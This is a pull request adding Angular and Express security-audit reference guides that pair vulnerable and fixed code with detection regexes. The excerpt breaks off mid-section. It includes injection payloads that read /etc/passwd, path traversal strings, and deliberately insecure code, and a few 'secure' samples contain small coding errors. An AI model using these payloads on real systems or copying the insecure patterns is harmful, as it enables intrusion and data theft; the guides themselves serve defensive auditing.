### PR TITLE
feat(references): add JavaScript/TypeScript ecosystem security guides

### DIFF
--- a/skills/security-audit/references/angular-security.md
+++ b/skills/security-audit/references/angular-security.md
@@ -1,0 +1,617 @@
+# Angular Security Patterns
+
+Security patterns, common misconfigurations, and detection regexes for Angular applications (Angular 2+). This reference covers XSS through sanitization bypasses, injection risks, authentication/authorization pitfalls, and framework-specific misconfigurations in the Angular ecosystem.
+
+---
+
+## Cross-Site Scripting (XSS)
+
+### SA-ANG-01 — `bypassSecurityTrust*` Misuse
+
+Angular's `DomSanitizer` provides `bypassSecurityTrustHtml`, `bypassSecurityTrustScript`, `bypassSecurityTrustUrl`, and `bypassSecurityTrustResourceUrl` methods. These explicitly disable Angular's built-in sanitization. When used with user-controlled input, they create direct XSS vulnerabilities.
+
+```typescript
+// VULNERABLE: Bypassing sanitizer with user input
+import { Component } from '@angular/core';
+import { DomSanitizer, SafeHtml } from '@angular/platform-browser';
+
+@Component({
+  selector: 'app-comment',
+  template: `<div [innerHTML]="trustedComment"></div>`
+})
+export class CommentComponent {
+  trustedComment: SafeHtml;
+
+  constructor(private sanitizer: DomSanitizer) {}
+
+  displayComment(userInput: string) {
+    // DANGEROUS: user input bypasses all sanitization
+    this.trustedComment = this.sanitizer.bypassSecurityTrustHtml(userInput);
+  }
+}
+```
+
+```typescript
+// SECURE: Use Angular's built-in sanitization or a sanitize library
+import { Component } from '@angular/core';
+import { DomSanitizer, SafeHtml } from '@angular/platform-browser';
+import DOMPurify from 'dompurify';
+
+@Component({
+  selector: 'app-comment',
+  template: `<div [innerHTML]="sanitizedComment"></div>`
+})
+export class CommentComponent {
+  sanitizedComment: SafeHtml;
+
+  constructor(private sanitizer: DomSanitizer) {}
+
+  displayComment(userInput: string) {
+    // Option 1: Let Angular's built-in sanitizer handle it
+    this.sanitizedComment = userInput; // Angular sanitizes by default
+
+    // Option 2: Pre-sanitize with DOMPurify for stricter control
+    const clean = DOMPurify.sanitize(userInput);
+    this.sanitizedComment = this.sanitizer.bypassSecurityTrustHtml(clean);
+  }
+}
+```
+
+**Detection regex:** `bypassSecurityTrust(Html|Script|Url|ResourceUrl)\s*\(`
+**Severity:** error
+
+**Why it matters:** Angular automatically sanitizes values bound to properties like `innerHTML`, `href`, and `src`. The `bypassSecurityTrust*` methods explicitly opt out of this protection. Every usage must be audited to ensure only server-controlled or pre-sanitized content is passed through.
+
+---
+
+### SA-ANG-02 — Dynamic Template Compilation / Template Injection
+
+Dynamically compiling Angular templates at runtime with user-controlled content allows template injection. Angular's template syntax includes powerful expressions that can access component properties and methods.
+
+```typescript
+// VULNERABLE: Dynamic template compilation with user input
+import { Compiler, Component, NgModule, ViewContainerRef } from '@angular/core';
+
+@Component({
+  selector: 'app-dynamic',
+  template: `<ng-container #container></ng-container>`
+})
+export class DynamicComponent {
+  constructor(
+    private compiler: Compiler,
+    private vcr: ViewContainerRef
+  ) {}
+
+  renderUserTemplate(userTemplate: string) {
+    // Attacker injects: {{constructor.constructor('alert(1)')()}}
+    const tmpComponent = Component({ template: userTemplate })(class {});
+    const tmpModule = NgModule({ declarations: [tmpComponent] })(class {});
+    this.compiler.compileModuleAndAllComponentsAsync(tmpModule)
+      .then(factories => {
+        const factory = factories.componentFactories[0];
+        this.vcr.createComponent(factory);
+      });
+  }
+}
+```
+
+```typescript
+// SECURE: Use predefined templates with data binding, not dynamic compilation
+import { Component, Input } from '@angular/core';
+
+@Component({
+  selector: 'app-safe-render',
+  template: `
+    <div class="user-content">
+      <h3>{{ title }}</h3>
+      <p>{{ content }}</p>
+    </div>
+  `
+})
+export class SafeRenderComponent {
+  @Input() title: string = '';
+  @Input() content: string = '';
+}
+```
+
+**Detection regex:** `compiler\.compileModuleAndAllComponentsAsync|Component\(\s*\{\s*template\s*:`
+**Severity:** error
+
+**Why it matters:** Angular's Ahead-of-Time (AOT) compilation is a security feature — it pre-compiles templates at build time, preventing runtime template injection. JIT compilation with user-controlled templates bypasses this protection entirely, granting attackers full access to the component context.
+
+---
+
+### SA-ANG-03 — `DomSanitizer` Bypass Patterns
+
+Developers sometimes create custom pipes or utility functions that systematically bypass Angular's sanitizer, effectively disabling security for entire categories of bindings across the application.
+
+```typescript
+// VULNERABLE: Pipe that globally bypasses sanitization
+import { Pipe, PipeTransform } from '@angular/core';
+import { DomSanitizer, SafeHtml } from '@angular/platform-browser';
+
+@Pipe({ name: 'safeHtml' })
+export class SafeHtmlPipe implements PipeTransform {
+  constructor(private sanitizer: DomSanitizer) {}
+
+  transform(value: string): SafeHtml {
+    // Every usage of this pipe bypasses sanitization
+    return this.sanitizer.bypassSecurityTrustHtml(value);
+  }
+}
+
+// Usage in template — looks innocuous but is dangerous
+// <div [innerHTML]="userComment | safeHtml"></div>
+```
+
+```typescript
+// SECURE: Pipe that sanitizes using DOMPurify instead of bypassing
+import { Pipe, PipeTransform } from '@angular/core';
+import DOMPurify from 'dompurify';
+
+@Pipe({ name: 'sanitizeHtml' })
+export class SanitizeHtmlPipe implements PipeTransform {
+  transform(value: string): string {
+    // Sanitize the content — Angular will also apply its own sanitization
+    return DOMPurify.sanitize(value, {
+      ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
+      ALLOWED_ATTR: ['href', 'title']
+    });
+  }
+}
+```
+
+**Detection regex:** `@Pipe[\s\S]*?bypassSecurityTrust`
+**Severity:** error
+
+**Why it matters:** A bypass pipe is a force multiplier for XSS — a single pipe definition creates a reusable sanitization bypass used across many templates. Developers treat pipes as safe transformations, so the danger is hidden behind a clean API. Auditing `bypassSecurityTrust` calls in pipes is critical.
+
+---
+
+### SA-ANG-04 — `innerHTML` Binding with User Input
+
+While Angular sanitizes `[innerHTML]` bindings by default, relying on this alone is insufficient for complex HTML content. Additionally, when combined with `bypassSecurityTrust*`, the sanitization is removed.
+
+```typescript
+// VULNERABLE: innerHTML binding with data from untrusted source
+@Component({
+  selector: 'app-post',
+  template: `
+    <article>
+      <h2>{{ post.title }}</h2>
+      <div [innerHTML]="post.htmlContent"></div>
+    </article>
+  `
+})
+export class PostComponent {
+  post = {
+    title: '',
+    // HTML content from external CMS or user input
+    // Angular sanitizes this, but complex payloads may slip through
+    htmlContent: ''
+  };
+
+  loadPost(data: any) {
+    // Directly assigning unsanitized external HTML
+    this.post.htmlContent = data.body;
+  }
+}
+```
+
+```typescript
+// SECURE: Pre-sanitize HTML content before binding
+import DOMPurify from 'dompurify';
+
+@Component({
+  selector: 'app-post',
+  template: `
+    <article>
+      <h2>{{ post.title }}</h2>
+      <div [innerHTML]="post.htmlContent"></div>
+    </article>
+  `
+})
+export class PostComponent {
+  post = { title: '', htmlContent: '' };
+
+  loadPost(data: any) {
+    this.post.title = data.title;
+    // Pre-sanitize with strict allowlist
+    this.post.htmlContent = DOMPurify.sanitize(data.body, {
+      ALLOWED_TAGS: ['p', 'br', 'strong', 'em', 'ul', 'ol', 'li', 'a'],
+      ALLOWED_ATTR: ['href']
+    });
+  }
+}
+```
+
+**Detection regex:** `\[innerHTML\]\s*=`
+**Severity:** warning
+
+**Why it matters:** Angular's built-in sanitizer handles many XSS vectors, but it is not a complete defense. Complex or novel payloads, sanitizer bugs, or the use of `bypassSecurityTrust*` in the data pipeline can bypass it. Defense-in-depth requires pre-sanitizing HTML content before it reaches the template.
+
+---
+
+## Injection
+
+### SA-ANG-05 — Route Guard Bypass (Client-Side Only Authorization)
+
+Angular route guards (`CanActivate`, `CanLoad`, `CanActivateChild`) execute entirely in the browser. They are a UX mechanism, not a security boundary. Any authorization enforced only via route guards can be bypassed.
+
+```typescript
+// VULNERABLE: Authorization enforced only client-side
+import { Injectable } from '@angular/core';
+import { CanActivate, Router } from '@angular/router';
+
+@Injectable({ providedIn: 'root' })
+export class AdminGuard implements CanActivate {
+  constructor(private router: Router) {}
+
+  canActivate(): boolean {
+    // This runs in the browser — trivially bypassed
+    const role = localStorage.getItem('userRole');
+    if (role === 'admin') {
+      return true;
+    }
+    this.router.navigate(['/unauthorized']);
+    return false;
+  }
+}
+
+// Route config
+const routes = [
+  { path: 'admin', component: AdminComponent, canActivate: [AdminGuard] }
+];
+```
+
+```typescript
+// SECURE: Server-side authorization + client guard as UX convenience
+@Injectable({ providedIn: 'root' })
+export class AdminGuard implements CanActivate {
+  constructor(private authService: AuthService, private router: Router) {}
+
+  async canActivate(): Promise<boolean> {
+    try {
+      // Verify with the server — but this is still just UX
+      await this.authService.verifyAdminAccess();
+      return true;
+    } catch {
+      this.router.navigate(['/unauthorized']);
+      return false;
+    }
+  }
+}
+
+// SERVER-SIDE: The real security boundary
+// Express middleware example
+app.use('/api/admin/*', authenticateToken, (req, res, next) => {
+  if (req.user.role !== 'admin') {
+    return res.status(403).json({ error: 'Insufficient privileges' });
+  }
+  next();
+});
+```
+
+**Detection regex:** `canActivate|CanActivate|canLoad|CanLoad`
+**Severity:** warning
+
+**Why it matters:** Client-side route guards protect the UI, not the data. An attacker can modify `localStorage`, use browser devtools to override the guard return value, or call backend APIs directly. Every route guard must have a corresponding server-side authorization check.
+
+---
+
+### SA-ANG-06 — HTTP Interceptor Misconfiguration
+
+Angular HTTP interceptors are the standard mechanism for attaching auth tokens, CSRF tokens, and security headers to outgoing requests. Misconfigured interceptors can leak credentials to third-party domains or fail to attach tokens at all.
+
+```typescript
+// VULNERABLE: Interceptor sends auth token to ALL domains
+import { Injectable } from '@angular/core';
+import { HttpInterceptor, HttpRequest, HttpHandler } from '@angular/common/http';
+
+@Injectable()
+export class AuthInterceptor implements HttpInterceptor {
+  intercept(req: HttpRequest<any>, next: HttpHandler) {
+    const token = localStorage.getItem('auth_token');
+    // Sends token to every HTTP request, including third-party APIs
+    const authReq = req.clone({
+      setHeaders: { Authorization: `Bearer ${token}` }
+    });
+    return next.handle(authReq);
+  }
+}
+```
+
+```typescript
+// SECURE: Only attach tokens to same-origin or allowlisted API domains
+import { Injectable } from '@angular/core';
+import { HttpInterceptor, HttpRequest, HttpHandler } from '@angular/common/http';
+import { environment } from '../environments/environment';
+
+@Injectable()
+export class AuthInterceptor implements HttpInterceptor {
+  private allowedOrigins = [
+    environment.apiUrl,
+    'https://api.trusted-service.com'
+  ];
+
+  intercept(req: HttpRequest<any>, next: HttpHandler) {
+    const isAllowed = this.allowedOrigins.some(origin =>
+      req.url.startsWith(origin)
+    );
+
+    if (isAllowed) {
+      const token = localStorage.getItem('auth_token');
+      if (token) {
+        const authReq = req.clone({
+          setHeaders: { Authorization: `Bearer ${token}` }
+        });
+        return next.handle(authReq);
+      }
+    }
+
+    return next.handle(req);
+  }
+}
+```
+
+**Detection regex:** `HttpInterceptor[\s\S]*?intercept\s*\(`
+**Severity:** warning
+
+**Why it matters:** HTTP interceptors operate globally on all `HttpClient` requests. A misconfigured interceptor that does not check the request URL before attaching credentials will leak tokens to third-party analytics, CDNs, and other external services. This is a common SSRF and credential leak vector.
+
+---
+
+### SA-ANG-07 — `eval` in Expressions and Services
+
+Using `eval()`, `new Function()`, or `setTimeout`/`setInterval` with string arguments in Angular services or components allows arbitrary code execution if user input reaches these functions.
+
+```typescript
+// VULNERABLE: eval in an Angular service
+import { Injectable } from '@angular/core';
+
+@Injectable({ providedIn: 'root' })
+export class FormulaService {
+  calculate(userFormula: string): number {
+    // Direct code injection via eval
+    return eval(userFormula);
+  }
+}
+
+@Component({
+  selector: 'app-calculator',
+  template: `<input [(ngModel)]="formula" (change)="compute()">`
+})
+export class CalculatorComponent {
+  formula = '';
+  result = 0;
+
+  constructor(private formulaService: FormulaService) {}
+
+  compute() {
+    // User input flows directly to eval
+    this.result = this.formulaService.calculate(this.formula);
+  }
+}
+```
+
+```typescript
+// SECURE: Use a safe expression evaluator
+import { Injectable } from '@angular/core';
+import { evaluate } from 'mathjs';
+
+@Injectable({ providedIn: 'root' })
+export class FormulaService {
+  calculate(userFormula: string): number {
+    try {
+      return evaluate(userFormula);
+    } catch {
+      return NaN;
+    }
+  }
+}
+```
+
+**Detection regex:** `eval\s*\([^)]*\)|new\s+Function\s*\(`
+**Severity:** error
+
+**Why it matters:** Angular's template expressions are sandboxed and do not allow arbitrary JS. However, `eval()` in TypeScript services and components bypasses this sandbox entirely. Dependency injection makes it easy for user input to flow through services to `eval()` calls.
+
+---
+
+## Data Exposure & Misconfiguration
+
+### SA-ANG-08 — Zone.js Context Leaks
+
+Zone.js patches all async operations in Angular. Long-running or improperly scoped zones can retain references to sensitive data, preventing garbage collection and creating memory-resident secrets.
+
+```typescript
+// VULNERABLE: Sensitive data persisting in Zone context
+import { Component, NgZone } from '@angular/core';
+
+@Component({
+  selector: 'app-payment',
+  template: `<button (click)="processPayment()">Pay</button>`
+})
+export class PaymentComponent {
+  constructor(private ngZone: NgZone) {}
+
+  processPayment() {
+    const creditCard = this.getCreditCardInput();
+    // Zone.js wraps this — creditCard stays in zone context
+    this.ngZone.run(() => {
+      this.apiService.charge(creditCard).subscribe(result => {
+        // creditCard still referenced in zone's task data
+        this.showReceipt(result);
+      });
+    });
+  }
+}
+```
+
+```typescript
+// SECURE: Run sensitive operations outside Angular zone, clear references
+import { Component, NgZone } from '@angular/core';
+
+@Component({
+  selector: 'app-payment',
+  template: `<button (click)="processPayment()">Pay</button>`
+})
+export class PaymentComponent {
+  constructor(private ngZone: NgZone) {}
+
+  processPayment() {
+    let creditCard = this.getCreditCardInput();
+
+    // Run outside zone to minimize context retention
+    this.ngZone.runOutsideAngular(() => {
+      this.apiService.charge(creditCard).subscribe(result => {
+        // Explicitly clear the sensitive reference
+        creditCard = null;
+
+        // Re-enter zone only for UI update
+        this.ngZone.run(() => {
+          this.showReceipt(result);
+        });
+      });
+    });
+  }
+}
+```
+
+**Detection regex:** `ngZone\.run\s*\([\s\S]*?(password|token|secret|creditCard|ssn|apiKey)`
+**Severity:** warning
+
+**Why it matters:** Zone.js maintains a task queue that retains references to closures and their captured variables. Sensitive data captured in these closures persists longer than expected, surviving in memory where it can be extracted via heap dumps or memory inspection tools.
+
+---
+
+### SA-ANG-09 — Missing CSRF Token in HttpClient
+
+Angular's `HttpClient` does not automatically include CSRF tokens. If the backend expects a CSRF token (common with cookie-based auth), failing to configure the `HttpClientXsrfModule` leaves the application vulnerable to cross-site request forgery.
+
+```typescript
+// VULNERABLE: HttpClient without CSRF token configuration
+import { NgModule } from '@angular/core';
+import { HttpClientModule } from '@angular/common/http';
+
+@NgModule({
+  imports: [
+    HttpClientModule  // No XSRF configuration
+  ]
+})
+export class AppModule {}
+```
+
+```typescript
+// SECURE: Configure XSRF token handling
+import { NgModule } from '@angular/core';
+import { HttpClientModule, HttpClientXsrfModule } from '@angular/common/http';
+
+@NgModule({
+  imports: [
+    HttpClientModule,
+    HttpClientXsrfModule.withOptions({
+      cookieName: 'XSRF-TOKEN',   // Cookie name set by backend
+      headerName: 'X-XSRF-TOKEN'  // Header name expected by backend
+    })
+  ]
+})
+export class AppModule {}
+
+// For standalone components (Angular 16+):
+import { provideHttpClient, withXsrfConfiguration } from '@angular/common/http';
+
+bootstrapApplication(AppComponent, {
+  providers: [
+    provideHttpClient(
+      withXsrfConfiguration({
+        cookieName: 'XSRF-TOKEN',
+        headerName: 'X-XSRF-TOKEN'
+      })
+    )
+  ]
+});
+```
+
+**Detection regex:** `HttpClientModule[^]*?(?!HttpClientXsrfModule)|provideHttpClient\s*\([^)]*(?!withXsrfConfiguration)`
+**Severity:** warning
+
+**Why it matters:** Cookie-based authentication is inherently vulnerable to CSRF. Angular provides `HttpClientXsrfModule` to read CSRF tokens from cookies and attach them as headers, but it must be explicitly configured. Without it, state-changing requests can be forged from attacker-controlled pages.
+
+---
+
+### SA-ANG-10 — Insecure Direct Object Reference in Angular Services
+
+Angular services that construct API URLs using user-supplied IDs without server-side authorization checks enable IDOR vulnerabilities.
+
+```typescript
+// VULNERABLE: Direct object reference without server-side authorization
+@Injectable({ providedIn: 'root' })
+export class UserService {
+  constructor(private http: HttpClient) {}
+
+  getUserProfile(userId: string) {
+    // Any user can fetch any profile by changing the ID
+    return this.http.get(`/api/users/${userId}/profile`);
+  }
+
+  deleteUser(userId: string) {
+    // No authorization check — relies on client-side role
+    return this.http.delete(`/api/users/${userId}`);
+  }
+}
+```
+
+```typescript
+// SECURE: Server-side authorization; use session-based identity for sensitive ops
+@Injectable({ providedIn: 'root' })
+export class UserService {
+  constructor(private http: HttpClient) {}
+
+  getMyProfile() {
+    // Server derives user ID from authenticated session
+    return this.http.get('/api/users/me/profile');
+  }
+
+  getUserProfile(userId: string) {
+    // Server must verify caller has permission to view this profile
+    return this.http.get(`/api/users/${userId}/profile`);
+    // Backend enforces: only self, admin, or explicit share
+  }
+}
+```
+
+**Detection regex:** `this\.http\.(get|post|put|delete|patch)\s*\(\s*[\`'"].*\$\{`
+**Severity:** warning
+
+**Why it matters:** Angular services make it easy to parameterize API calls, but the security boundary must be on the server. Client-side Angular code cannot enforce object-level authorization. Every endpoint that takes a user-supplied ID must validate that the authenticated user is authorized to access that resource.
+
+---
+
+## Remediation Priority
+
+| Finding | Severity | Remediation Timeline | Effort |
+|---------|----------|---------------------|--------|
+| SA-ANG-01 — `bypassSecurityTrust*` misuse | Critical | Immediate | Medium |
+| SA-ANG-02 — Dynamic template compilation | Critical | Immediate | High |
+| SA-ANG-03 — `DomSanitizer` bypass pipe | Critical | Immediate | Low |
+| SA-ANG-04 — `innerHTML` binding | High | 1 week | Low |
+| SA-ANG-05 — Route guard bypass | High | 1 week | Medium |
+| SA-ANG-06 — Interceptor misconfiguration | High | 1 week | Low |
+| SA-ANG-07 — `eval` in services | Critical | Immediate | Medium |
+| SA-ANG-08 — Zone.js context leaks | Medium | 1 month | Medium |
+| SA-ANG-09 — Missing CSRF token | High | 1 week | Low |
+| SA-ANG-10 — IDOR in Angular services | High | 1 week | Low |
+
+## Related References
+
+- `owasp-top10.md` — OWASP Top 10 mapping
+- `javascript-typescript-security-features.md` — Language-level JS/TS patterns
+- `frontend-security.md` — General frontend security patterns
+- `security-headers.md` — CSP and security header configuration
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 8 |

--- a/skills/security-audit/references/express-security.md
+++ b/skills/security-audit/references/express-security.md
@@ -1,0 +1,515 @@
+# Express Security Patterns
+
+Security patterns, common misconfigurations, and detection regexes for Express.js applications. Express is intentionally minimal and unopinionated, meaning security features like header hardening, CSRF protection, input validation, and rate limiting must be explicitly added via middleware. The ordering and configuration of this middleware is critical -- misplacement or misconfiguration is the most common source of vulnerabilities.
+
+---
+
+## Middleware Ordering
+
+### SA-EXPRESS-01: Middleware Ordering (Helmet, CORS, Auth)
+
+Express executes middleware in registration order. Security middleware (Helmet for headers, CORS, rate limiting) must be registered before route handlers. Auth middleware registered after routes leaves those routes unprotected.
+
+```javascript
+// VULNERABLE: Routes defined before security middleware
+const app = express();
+
+app.get('/api/users', listUsers);          // No helmet, no CORS, no auth
+app.delete('/api/users/:id', deleteUser);  // Completely unprotected
+
+// Security middleware added too late
+app.use(helmet());
+app.use(cors({ origin: 'https://app.example.com' }));
+app.use(authMiddleware);
+
+app.listen(3000);
+
+// VULNERABLE: No helmet at all — missing security headers
+const app = express();
+app.use(express.json());
+app.use('/api', apiRouter);
+// No helmet() — no X-Content-Type-Options, no CSP, no HSTS, etc.
+app.listen(3000);
+```
+
+```javascript
+// SECURE: Correct middleware ordering
+const app = express();
+
+// 1. Security headers (first — applies to all responses)
+app.use(helmet());
+
+// 2. CORS (before routes, after helmet)
+app.use(cors({
+  origin: ['https://app.example.com'],
+  credentials: true,
+}));
+
+// 3. Body parsing
+app.use(express.json({ limit: '10kb' }));
+app.use(express.urlencoded({ extended: false }));
+
+// 4. Rate limiting (before auth to protect login endpoints)
+app.use(rateLimit({ windowMs: 15 * 60 * 1000, max: 100 }));
+
+// 5. Auth middleware on protected routes
+app.use('/api', authMiddleware, apiRouter);
+
+// 6. Public routes
+app.use('/health', healthRouter);
+
+// 7. Error handler LAST
+app.use(errorHandler);
+
+app.listen(3000);
+```
+
+**Detection regex:** `app\.(get|post|put|delete|use)\s*\([^)]*\)[\s\S]*?app\.use\s*\(\s*helmet\s*\(`
+**Severity:** error
+
+---
+
+## Injection via Request Parameters
+
+### SA-EXPRESS-02: req.params / req.query Injection
+
+Express passes user input through `req.params`, `req.query`, and `req.body`. Using these values directly in database queries, shell commands, or template rendering without validation enables injection attacks. Note that `req.query` values can be strings OR arrays, which can bypass type-checking logic.
+
+```javascript
+// VULNERABLE: req.query directly in MongoDB query (NoSQL injection)
+app.get('/api/users', async (req, res) => {
+  const users = await User.find({ role: req.query.role });
+  // Attacker sends: ?role[$ne]=null  →  returns ALL users
+  res.json(users);
+});
+
+// VULNERABLE: req.params in shell command
+app.get('/api/logs/:filename', (req, res) => {
+  const output = execSync(`cat logs/${req.params.filename}`);
+  // Attacker sends: /api/logs/access.log;cat /etc/passwd
+  res.send(output);
+});
+
+// VULNERABLE: req.query type confusion
+app.get('/api/search', (req, res) => {
+  if (req.query.admin === 'true') {
+    // Attacker sends: ?admin=true  →  type is string, passes check
+    // OR: ?admin[]=true  →  type is array, may bypass other checks
+  }
+});
+```
+
+```javascript
+// SECURE: Validate and sanitize all inputs
+const { query, validationResult } = require('express-validator');
+
+app.get('/api/users',
+  query('role').isIn(['user', 'editor', 'admin']).optional(),
+  (req, res) => {
+    const errors = validationResult(req);
+    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
+
+    const users = await User.find({ role: req.query.role });
+    res.json(users);
+  }
+);
+
+// SECURE: Never use user input in shell commands
+app.get('/api/logs/:filename', (req, res) => {
+  const basename = path.basename(req.params.filename);
+  const allowed = /^[a-zA-Z0-9_-]+\.log$/.test(basename);
+  if (!allowed) return res.status(400).json({ error: 'Invalid filename' });
+
+  const logPath = path.join(__dirname, 'logs', basename);
+  const resolved = fs.realpathSync(logPath);
+  if (!resolved.startsWith(path.join(__dirname, 'logs'))) {
+    return res.status(404).json({ error: 'Not found' });
+  }
+  res.sendFile(resolved);
+});
+```
+
+**Detection regex:** `execSync\s*\(.*req\.(params|query|body)|exec\s*\(.*req\.(params|query|body)`
+**Severity:** error
+
+---
+
+## Path Traversal
+
+### SA-EXPRESS-03: res.sendFile Path Traversal
+
+`res.sendFile()` serves files from the filesystem. Without the `root` option or path validation, user-controlled input can traverse directories.
+
+```javascript
+// VULNERABLE: User input directly in sendFile without root option
+app.get('/files/:name', (req, res) => {
+  res.sendFile(req.params.name);
+  // Attacker sends: /files/../../../etc/passwd
+});
+
+// VULNERABLE: Path concatenation
+app.get('/download', (req, res) => {
+  const filePath = path.join(__dirname, 'uploads', req.query.file);
+  // path.join does NOT prevent traversal: path.join('/uploads', '../../../etc/passwd')
+  //   → '/etc/passwd'
+  res.sendFile(filePath);
+});
+
+// VULNERABLE: Insufficient sanitization
+app.get('/files/:name', (req, res) => {
+  const safe = req.params.name.replace(/\.\./g, '');
+  // Can be bypassed: '....//....//etc/passwd' → '../../etc/passwd'
+  res.sendFile(path.join(__dirname, 'uploads', safe));
+});
+```
+
+```javascript
+// SECURE: Use root option to restrict to a directory
+app.get('/files/:name', (req, res) => {
+  const options = {
+    root: path.join(__dirname, 'uploads'),
+    dotfiles: 'deny',
+  };
+  // sendFile with root option rejects paths containing ..
+  res.sendFile(req.params.name, options, (err) => {
+    if (err) res.status(404).json({ error: 'Not found' });
+  });
+});
+
+// SECURE: Validate basename and verify resolved path
+app.get('/download', (req, res) => {
+  const basename = path.basename(req.query.file);
+  const uploadsDir = path.resolve(__dirname, 'uploads');
+  const fullPath = path.resolve(uploadsDir, basename);
+
+  if (!fullPath.startsWith(uploadsDir + path.sep)) {
+    return res.status(400).json({ error: 'Invalid path' });
+  }
+
+  res.sendFile(fullPath);
+});
+```
+
+**Detection regex:** `res\.sendFile\s*\(\s*(?:req\.(params|query|body)|path\.join\s*\([^)]*req\.(params|query|body))`
+**Severity:** error
+
+---
+
+## Session Configuration
+
+### SA-EXPRESS-04: Session Configuration (Secure Cookies, Session Store)
+
+Express sessions via `express-session` must be configured with secure cookie flags, a production-grade session store, and a strong secret. The default in-memory store leaks memory and does not scale.
+
+```javascript
+// VULNERABLE: Insecure session configuration
+const session = require('express-session');
+
+app.use(session({
+  secret: 'keyboard cat',           // Weak, hardcoded secret
+  resave: true,                      // Unnecessary writes
+  saveUninitialized: true,           // Creates sessions for unauthenticated users
+  // Missing cookie security flags
+  // Using default MemoryStore — memory leak in production
+}));
+
+// VULNERABLE: Cookie without secure flag
+app.use(session({
+  secret: process.env.SESSION_SECRET,
+  cookie: {
+    httpOnly: false,   // Accessible to JavaScript — XSS can steal session
+    secure: false,     // Sent over HTTP — MITM can steal session
+    sameSite: 'none',  // Cross-site requests allowed
+  },
+}));
+```
+
+```javascript
+// SECURE: Production session configuration
+const session = require('express-session');
+const RedisStore = require('connect-redis').default;
+const { createClient } = require('redis');
+
+const redisClient = createClient({ url: process.env.REDIS_URL });
+redisClient.connect();
+
+app.set('trust proxy', 1); // Required for secure cookies behind a reverse proxy
+
+app.use(session({
+  store: new RedisStore({ client: redisClient }),
+  secret: process.env.SESSION_SECRET,   // Strong, from environment
+  resave: false,
+  saveUninitialized: false,
+  name: '__session',                    // Custom name (not 'connect.sid')
+  cookie: {
+    httpOnly: true,      // Not accessible to JavaScript
+    secure: true,        // HTTPS only
+    sameSite: 'strict',  // No cross-site sending
+    maxAge: 1800000,     // 30 minutes
+  },
+}));
+```
+
+**Detection regex:** `session\s*\(\s*\{[^}]*secret\s*:\s*['"][^'"]{0,20}['"]|cookie\s*:\s*\{[^}]*httpOnly\s*:\s*false|cookie\s*:\s*\{[^}]*secure\s*:\s*false`
+**Severity:** error
+
+---
+
+## Rate Limiting
+
+### SA-EXPRESS-05: Rate Limiting
+
+Without rate limiting, Express applications are vulnerable to brute-force attacks, credential stuffing, and API abuse. The `express-rate-limit` middleware should be applied globally with stricter limits on authentication endpoints.
+
+```javascript
+// VULNERABLE: No rate limiting
+const app = express();
+
+app.post('/api/login', loginHandler);           // Brute force
+app.post('/api/register', registerHandler);     // Account spam
+app.post('/api/forgot-password', forgotHandler); // Enumeration
+app.get('/api/search', searchHandler);          // DoS
+
+app.listen(3000);
+```
+
+```javascript
+// SECURE: Global and per-route rate limiting
+const rateLimit = require('express-rate-limit');
+
+// Global: 100 requests per 15 minutes
+const globalLimiter = rateLimit({
+  windowMs: 15 * 60 * 1000,
+  max: 100,
+  standardHeaders: true,
+  legacyHeaders: false,
+});
+app.use(globalLimiter);
+
+// Strict: 5 attempts per 15 minutes for auth endpoints
+const authLimiter = rateLimit({
+  windowMs: 15 * 60 * 1000,
+  max: 5,
+  message: { error: 'Too many attempts, try again later' },
+});
+app.use('/api/login', authLimiter);
+app.use('/api/forgot-password', authLimiter);
+```
+
+**Detection regex:** `app\.(post|put)\s*\(\s*['"]\/[^'"]*(?:login|auth|token|password|register)[^'"]*['"]`
+**Severity:** warning
+
+---
+
+## Input Validation
+
+### SA-EXPRESS-06: Input Validation (express-validator Patterns)
+
+Express does not validate input by default. All request data (`req.body`, `req.query`, `req.params`) must be explicitly validated. Using `express-validator` or `joi` is recommended over manual checks.
+
+```javascript
+// VULNERABLE: No input validation
+app.post('/api/users', async (req, res) => {
+  const { name, email, age } = req.body;
+  // No type checking, no length limits, no format validation
+  const user = await User.create({ name, email, age });
+  res.json(user);
+});
+
+// VULNERABLE: Trusting req.body shape for database operations
+app.put('/api/users/:id', async (req, res) => {
+  await User.findByIdAndUpdate(req.params.id, req.body);
+  // Attacker can set any field: { isAdmin: true, role: 'superadmin' }
+  res.json({ success: true });
+});
+```
+
+```javascript
+// SECURE: express-validator with explicit rules
+const { body, param, validationResult } = require('express-validator');
+
+app.post('/api/users',
+  body('name').isString().trim().isLength({ min: 1, max: 100 }),
+  body('email').isEmail().normalizeEmail(),
+  body('age').isInt({ min: 0, max: 150 }),
+  async (req, res) => {
+    const errors = validationResult(req);
+    if (!errors.isEmpty()) {
+      return res.status(400).json({ errors: errors.array() });
+    }
+    const { name, email, age } = req.body;
+    const user = await User.create({ name, email, age });
+    res.json(user);
+  }
+);
+
+// SECURE: Allowlist fields for update
+app.put('/api/users/:id',
+  param('id').isMongoId(),
+  body('name').isString().trim().isLength({ min: 1, max: 100 }).optional(),
+  body('email').isEmail().normalizeEmail().optional(),
+  async (req, res) => {
+    const errors = validationResult(req);
+    if (!errors.isEmpty()) {
+      return res.status(400).json({ errors: errors.array() });
+    }
+    const allowed = pick(req.body, ['name', 'email']); // Only safe fields
+    await User.findByIdAndUpdate(req.params.id, allowed);
+    res.json({ success: true });
+  }
+);
+```
+
+**Detection regex:** `findByIdAndUpdate\s*\([^,]+,\s*req\.body\s*\)|\.create\s*\(\s*req\.body\s*\)`
+**Severity:** warning
+
+---
+
+## Code Injection
+
+### SA-EXPRESS-07: eval() in Route Handlers
+
+Using `eval()`, `new Function()`, `vm.runInNewContext()`, or `child_process.exec()` with user input enables arbitrary code execution.
+
+```javascript
+// VULNERABLE: eval with user input
+app.get('/api/calculate', (req, res) => {
+  const expression = req.query.expr;
+  const result = eval(expression);
+  // Attacker sends: ?expr=process.exit(1)
+  // Or: ?expr=require('child_process').execSync('cat /etc/passwd').toString()
+  res.json({ result });
+});
+
+// VULNERABLE: new Function with user input
+app.post('/api/transform', (req, res) => {
+  const fn = new Function('data', req.body.transform);
+  const result = fn(req.body.data);
+  res.json({ result });
+});
+
+// VULNERABLE: vm module with user code
+const vm = require('vm');
+app.post('/api/sandbox', (req, res) => {
+  const result = vm.runInNewContext(req.body.code, {});
+  // vm is NOT a security sandbox — it can be escaped
+  res.json({ result });
+});
+```
+
+```javascript
+// SECURE: Use a safe expression evaluator
+const { Parser } = require('expr-eval');
